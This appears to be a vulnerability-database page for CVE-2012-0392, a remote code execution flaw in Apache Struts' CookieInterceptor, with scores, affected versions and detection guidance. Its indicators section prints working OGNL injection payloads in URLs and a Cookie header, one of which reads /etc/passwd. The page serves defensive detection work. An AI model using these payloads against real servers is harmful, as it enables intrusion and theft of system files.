cbcvebase.
CVE-2012-0392
published 2012-01-08

CVE-2012-0392: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary…

PriorityP268medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
96.79%
99.9th percentile
The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.

Affected

1 ranges
VendorProductVersion rangeFixed in
apachestruts>= 2.0.0 < 2.3.12.3.1

Detection & IOCsextracted from sources · hover to see the quote

url/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
url/Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
url/Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')
cookie(#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
  • Exploit targets the /devmode.action endpoint with the 'debug=command' parameter and an OGNL expression in the 'expression' parameter to achieve RCE; monitor HTTP GET requests to this path.
  • Malicious HTTP Cookie header contains OGNL expressions with '#_memberAccess["allowStaticMethodAccess"]' set to true and direct Runtime.exec() calls; inspect Cookie headers for these patterns.
  • Shodan/FOFA fingerprinting queries identify exposed Struts2 instances; use these to find potentially vulnerable internet-facing assets.
  • The vulnerability is triggered via the CookieInterceptor when cookie names are evaluated as OGNL expressions; look for HTTP requests to Struts .action endpoints accompanied by anomalous Cookie headers containing Java class references.
  • ·The vulnerability only applies when the CookieInterceptor is active in the Struts2 configuration; applications not using CookieInterceptor are not affected via the cookie vector.
  • ·The devmode.action RCE vector (exploit #3) only applies when the application is running in developer mode; disabling developer mode removes this specific attack surface.
  • ·Struts2-core jars were included in Red Hat Fuse Service Works 6.0.0 and Single Sign On 7.3.0+ source packages via a Google Guice import; customers building artefacts from source may be at risk even if the product itself does not actively use Struts2.

CVSS provenance

nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.